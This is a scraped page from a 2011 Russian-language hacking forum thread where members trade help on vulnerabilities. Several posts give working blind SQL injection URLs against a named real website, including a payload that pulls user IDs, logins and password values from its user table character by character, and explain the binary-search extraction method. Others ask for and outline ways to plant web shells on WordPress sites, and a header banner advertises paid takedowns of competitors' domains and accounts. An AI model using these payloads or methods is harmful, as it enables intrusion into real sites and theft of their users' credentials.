УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1718 из 2438

1718

Опции темы

Поиск в этой теме

Опции просмотра

#17171

05.06.2011, 07:17

ReV0LVeR

Guest

Сообщений: n/a

Провел на форуме:
11980

Репутация: 1

не уложилось в голове...

Давай примером , как мне оттуда достать второй символ?

,1,1(Почему 1,1 какой в этом смысловой нагруз?)))))>128(почму именно 128?),if(@x>196(Почему именно со 196 сравнение?),0,1(почему 0,1?)),if(@x>64,5,6(Тут тоже не понятно откудо взялось 64, что такое 5,6)))

#17172

05.06.2011, 12:38

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

M_script, зачем переменные? Можно и без них обойтись...

ReV0LVeR, синтаксис if такой:

Код:

Code:
if(условие,1,0)

Тоесть то же, что, например, на пхп выглядит так:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]условие[/COLOR][COLOR="#007700"])

  return[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

else

  return[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

Таким образом, если условие == true, то результат будет 1, если же нет - то false.

Покажу пример:

Код:

Code:
http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if(2=3-1,6,0),7,8,9,10,11--

Условие - то, что подчёркнуто и выделено, т.е. 2 = 3 - 1. Естественно, что это правда (true), и поэтому, в 6 колонку подставится значение 6. Если бы это была ложь (false) - вернулся бы 0, и, соответственно, страница бы не загрузилась.

Код:

Code:
http://divantvplus.ru/index.html?id=390 and 1=2 union select 1,2,3,4,5,if(1=2,6,0),7,8,9,10,11--

А дальше идёт посимвольный перебор значений. Об этом читай на ачате =)

#17173

05.06.2011, 15:20

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

[CODE]
Code:
http://divantvplus.ru/index.html?id=390 and ascii(substring((SELECT concat(sys_users.user_id,0x3a,sys_users.user_name, 0x3a,sys_users.super,0x3a,sys_users.admin,0x3a,sys _users.user_login,0x3a,sys_users.user_password) FROM divantvplus.sys_users LIMIT [B]1,1),16,1))

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

#17174

05.06.2011, 17:23

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от mailbrush

mailbrush said:
M_script
, зачем переменные? Можно и без них обойтись...

Для сокращения длины запроса. Потому что 4 различных состояния страницы, а не 2

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) {

   if([/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"]) {

      return[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"];

   }

   else {

      return[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"];

   }

}

else {

   if([/COLOR][COLOR="#0000BB"]x[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) {

      return[/COLOR][COLOR="#0000BB"]2

[/COLOR][COLOR="#007700"]}

   else {

      return[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];

   }

}[/COLOR][/COLOR]

#17175

05.06.2011, 17:28

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

В последнее время много шелов на wordpress 3.1.1! Поделитесь способом!

#17176

05.06.2011, 17:36

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Kuteke

Kuteke said:
В последнее время много шелов на wordpress 3.1.1! Поделитесь способом!

Где много?

#17177

05.06.2011, 18:08

M_script

Новичок

Регистрация: 04.11.2004

Сообщений: 5

Провел на форуме:
4512

Репутация: 0

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
Почему 1,1 какой в этом смысловой нагруз?

Один символ, начиная с первого.

2,1 - один символ, начиная со второго.

1,2 - два символа, начиная с первого.

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
почему именно 128?

Середина диапазона 0-255.

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
Почему именно со 196 сравнение?

Середина диапазона 128-255. Это условие проверяется, если первое условие x>128 выполнено.

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
Тут тоже не понятно откудо взялось 64

Середина диапазона 0-128. Это условие проверяется, если первое условие x>128 не выполнено.

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
почему 0,1?

Цитата:

Сообщение от ReV0LVeR

ReV0LVeR said:
что такое 5,6

Значения 0,1,5,6 попадая в поле 6 запроса дают различный вывод страницы.

Если выводится страница, соответсвующая 0, код символа находится в первом диапазоне 196-255

Если выводится страница, соответсвующая 1, код символа находится во втором диапазоне 128-196

Если выводится страница, соответсвующая 5, код символа находится в третьем диапазоне 64-128

Если выводится страница, соответсвующая 6, код символа находится в четвертом диапазоне 0-64

Найденный первым запросом диапазон так же делится на 4 части (в примере - 64-80, 80-96, 96-112, 112-128). Такое деление продолжается до тех пор, пока диапазон не будет ограничен одним числом.

Диапазон 0-255 я привел для примера, так как он универсальный. На практике все зависит от того, какое значение нужно получить.

#17178

05.06.2011, 18:17

Kuteke

Guest

Сообщений: n/a

Провел на форуме:
60692

Репутация: 6

Поделитесь способом заливки шела на WP 3.1.1! Попугай, в интернете

#17179

05.06.2011, 18:29

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Kuteke

Kuteke said:
Поделитесь способом заливки шела на WP 3.1.1! Попугай, в интернете

Да способы не изменились в принципе - правка шаблонов, правка плагинов, загрузка файлов(не всегда прокатывает)

#17180

05.06.2011, 18:39

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от попугай

попугай said:
Да способы не изменились в принципе - правка шаблонов, правка плагинов, загрузка файлов(не всегда прокатывает)

Я, так понимаю, он просит зиродэй плоенты под вп 3.1.1, а не сам процесс заливки шелла ))

Страница 1718 из 2438

1718

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход